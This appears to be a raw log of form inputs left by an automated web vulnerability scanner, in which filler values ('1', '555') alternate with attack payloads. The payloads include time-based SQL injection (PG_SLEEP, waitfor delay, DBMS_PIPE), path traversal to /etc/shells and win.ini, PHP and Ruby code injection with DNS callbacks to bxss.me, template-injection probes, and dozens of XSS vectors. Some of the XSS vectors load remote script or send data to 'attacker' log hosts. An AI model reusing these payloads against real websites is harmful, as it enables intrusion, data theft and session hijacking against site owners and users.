555
/etc/shells
";print(md5(31337));$a="
1
555
1
555
1
gethostbyname(lc('hitwk'.'hqewdxtkad9c7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(104).chr(89)
1
555
../../../../../../../../../../../../../../etc/shells
${@print(md5(31337))}
1
555
1
555
c:/windows/win.ini
${@print(md5(31337))}\
1
555
1
'.print(md5(31337)).'
1
555
1
555
1
555
1
555
bxss.me
555
1
555
1
555
1
555
1
555
1
555
Http://bxss.me/t/fit.txt
555
1
555
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
555
1
555
1zyJXHKKE' OR 341=(SELECT 341 FROM PG_SLEEP(15))--
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
5559qpvGQVk') OR 910=(SELECT 910 FROM PG_SLEEP(15))--
1
555
1
/etc/shells
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
555
1
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
555
1
555
1
555
1
bxss.me
1
555
1
555
1
555
1
555
1
Http://bxss.me/t/fit.txt
1
555
1
555
1
555
1
555
1
555
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1M0MpJ64a') OR 287=(SELECT 287 FROM PG_SLEEP(15))--
555
1
555
1
555
HttP://bxss.me/t/xss.html?%00
555
1
555
1
555
bxss.me/t/xss.html?%00
555
1
555ht4t2bVQ')) OR 733=(SELECT 733 FROM PG_SLEEP(15))--
1
555
1
HttP://bxss.me/t/xss.html?%00
1
555
1
555
"+"A".concat(70-3).concat(22*4).concat(110).concat(88).concat(103).concat(85)+(require"socket" Socket.gethostbyname("hitof"+"onkrrgdz7161a.bxss.me.")[3].to_s)+&
555
1
555
1
bxss.me/t/xss.html?%00
1
555
'+'A'.concat(70-3).concat(22*4).concat(105).concat(73).concat(113).concat(72)+(require'socket' Socket.gethostbyname('hituz'+'jlnaudsi48f8d.bxss.me.')[3].to_s)+&
555
1
555
1
555
'A'.concat(70-3).concat(22*4).concat(108).concat(75).concat(104).concat(88)+(require'socket' Socket.gethostbyname('hitfh'+'rlwgyynr330c7.bxss.me.')[3].to_s)
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(110).concat(89).concat(113).concat(76)+(require"socket" Socket.gethostbyname("hitzo"+"bgmnbdpc29bd4.bxss.me.")[3].to_s)+"
1
555
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(117).concat(88).concat(105).concat(88)+(require'socket' Socket.gethostbyname('hitja'+'wbfovyxs1b09d.bxss.me.')[3].to_s)+'
1
555
1
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(106).concat(89).concat(109).concat(69)+(require'socket' Socket.gethostbyname('hitmd'+'pkcpgreu8007d.bxss.me.')[3].to_s)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
17ConThGv')) OR 302=(SELECT 302 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
555
redirtest.acx
555
depoimentos/.
555
1
555
1
redirtest.acx
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
depoimentos
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1&n940905=v951981
555
1
555
1
555'"
1
555
1
555
1
555&n972767=v967148
1
555
1
555????%2527%2522\'\"
1
555
1
555
)
555
1
@@jvniz
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
^(#$!@#$)(()))******
(select 198766*667891)
1
555
1
555
1
555
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
1
)
1
555
1
555
1
555
1
555
1
!(()&&!|*|*|
1
555
1
555
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
^(#$!@#$)(()))******
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1'"
555
1
555
1
555
555
1
555
1
555
1????%2527%2522\'\"
555
1
555
1
555
1
555
555
1
555
1
555
1
555
@@JFjpy
555
'"()
555
1
555
(select 198766*667891)
555
1
555
1
555
1'&&sleep(27*1000)*qqiiic&&'
555
1
555
(select 198766*667891 from DUAL)
555
1"&&sleep(27*1000)*lrnclx&&"
555
1
555
1
555
1
555
1
555
1
555
1'||sleep(27*1000)*hxvftk||'
555
1
555
1
555
1
555
1
555
1"||sleep(27*1000)*ibirbq||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555'&&sleep(27*1000)*ntyelw&&'
1
555
1
555
1
555"&&sleep(27*1000)*sbpuip&&"
1
555
1
555'||sleep(27*1000)*nekgyi||'
1
555
1
555
1
555
1
555"||sleep(27*1000)*kdikpk||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555CJ6TRS7h
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
-1 OR 5*5=25 --
1
555
1
-1 OR 5*5=25
1
555
1
-1' OR 5*5=25 --
1
555
1
-1" OR 5*5=25 --
1
555
1
555
1
-1' OR 5*5=25 or 'vWVz9B5p'='
1
555
1
-1" OR 5*5=25 or "bk7SotvA"="
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
555
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
1
555
1
555RhBZDDHE'; waitfor delay '0:0:15' --
1
555
1
555
1
555-1 OR 676=(SELECT 676 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1) OR 530=(SELECT 530 FROM PG_SLEEP(15))--
1
555
1
555
1
555-1)) OR 630=(SELECT 630 FROM PG_SLEEP(15))--
1
555
1
555
1
555ZTf9H6Q1' OR 495=(SELECT 495 FROM PG_SLEEP(15))--
1
555
1
555
1
555AqHMnuRu') OR 962=(SELECT 962 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
5559IbIqEPa')) OR 182=(SELECT 182 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555
1
555'"
1
555????%2527%2522\'\"
1
555
1
@@2gszF
1
555
1
(select 198766*667891)
1
555
1
555
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'"()&%<zzz><ScRiPt >K9zQ(9315)</ScRiPt>
555
'"()&%<zzz><ScRiPt >K9zQ(9512)</ScRiPt>
555
1
555'"()&%<zzz><ScRiPt >KGz7(9170)</ScRiPt>
1
555
1
'"()&%<zzz><ScRiPt >KGz7(9280)</ScRiPt>
1
555
19889237
5559044600
1
555
1
555
bfg4095?s1?s2?s3?hjl4095
555
1
555
bfgx3502??z1??z2a?bcxhjl3502
555
1
bfg1218?s1?s2?s3?hjl1218
1
555
1
555
<%={{={@{#{${dfb}}%>
555
1
555
1
bfgx9373??z1??z2a?bcxhjl9373
1
555
1
555
<th:t="${dfb}#foreach
<%={{={@{#{${dfb}}%>
1
555
1
555
1
<th:t="${dfb}#foreach
1
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
555
1
555
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
555
1
555
1
dfb[[${98991*97996}]]xca
1
555
1
dfb__${98991*97996}__::.x
1
555
dfb__${98991*97996}__::.x
555
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
555
1
555
1
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >KGz7(9649)</ScRiPt>
1
555
1
555
1<ScRiPt >K9zQ(9022)</ScRiPt>
555
1
555<WHFDIB>G8BUY[!+!]</WHFDIB>
1
555
1
555
1
555
1<WLKP3N>UCMRQ[!+!]</WLKP3N>
555<script>KGz7(9530)</script>
1
555
1
555
1
555
1<script>K9zQ(9358)</script>
555
1
555
1
555
1<script>K9zQ(9837)</script>9837
555<script>KGz7(9645)</script>9645
1
555
1
555
1<ScR<ScRiPt>IpT>K9zQ(9534)</sCr<ScRiPt>IpT>
555<ScR<ScRiPt>IpT>KGz7(9968)</sCr<ScRiPt>IpT>
1
555
1
555
1
555
1
555<ScRiPt >KGz7(9302)</ScRiPt>
1
555
1
555
1<ScRiPt >K9zQ(9905)</ScRiPt>
555
1
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9150></ScRiPt>
1
555
1
555
1
555
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9107></ScRiPt>
555<ScRiPt >KGz7(9909)</ScRiPt>
1
555
1
555
1
555
1
555<svg ?onload=KGz7(9815);>
1
555
1<ScRiPt >K9zQ(9414)</ScRiPt>
555<isindex type=image src=1 onerror=KGz7(9010)>
1
555
1
555
1<svg ?onload=K9zQ(9952);>
555
1
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9170'>
1
555
1<isindex type=image src=1 onerror=K9zQ(9452)>
555
1
555
1
555
1
555
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9113'>
555
1
555<body onload=KGz7(9682)>
1
555
1
555
1<body onload=K9zQ(9941)>
555<img src=//xss.bxss.me/t/dot.gif onload=KGz7(9364)>
1
555
1
555
1<img src=//xss.bxss.me/t/dot.gif onload=K9zQ(9133)>
555
1
555<img src=xyz OnErRor=KGz7(9089)>
1
555
1
555
1
555
1<img src=xyz OnErRor=K9zQ(9480)>
555<img/src=">" onerror=alert(9957)>
1
555
1
555
1<img/src=">" onerror=alert(9710)>
555
1
%35%35%35%3C%53%63%52%69%50%74%20%3E%4B%47%7A%37%289312%29%3C%2F%73%43%72%69%70%54%3E
1
555
1
555
1
555
%31%3C%53%63%52%69%50%74%20%3E%4B%39%7A%51%289838%29%3C%2F%73%43%72%69%70%54%3E
555
1
555\u003CScRiPt\KGz7(9152)\u003C/sCripT\u003E
1
555
1
555
1\u003CScRiPt\K9zQ(9654)\u003C/sCripT\u003E
555
1
555<ScRiPt>KGz7(9711)</sCripT>
1
555
1
555
1<ScRiPt>K9zQ(9213)</sCripT>
555
1
?<img zzz onmouseover=KGz7(94261) //?>
1
555
1
555
?<img zzz onmouseover=K9zQ(95891) //?>
555
1
555
1
555<input autofocus onfocus=KGz7(9866)>
1
555
1<input autofocus onfocus=K9zQ(9939)>
555
1
555
1
<a HrEF=http://xss.bxss.me></a>
1
555
<a HrEF=http://xss.bxss.me></a>
555
1
555
1
<a HrEF=jaVaScRiPT:>
1
555
<a HrEF=jaVaScRiPT:>
555
1
555}body{zzz:Expre/**/SSion(KGz7(9584))}
1
555
1}body{zzz:Expre/**/SSion(K9zQ(9261))}
555
1
555CqdCB <ScRiPt >KGz7(9413)</ScRiPt>
1
555
1
555
1QvHzE <ScRiPt >K9zQ(9570)</ScRiPt>
555<WUP27L>5RVF1[!+!]</WUP27L>
1
555
1
555
1
555
1<WC22LD>GMTPD[!+!]</WC22LD>
555<ifRAme sRc=9323.com></IfRamE>
1
555
1
555
1
555
1
555<acUBSAo x=9135>
1
555
1<ifRAme sRc=9309.com></IfRamE>
555
1
555
1<aKm0cgx x=9858>
555<img sRc='http://attacker-9918/log.php?
1
555
1
555
1
555<af4NIIl<
1
555
1<img sRc='http://attacker-9775/log.php?
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1<azRz122<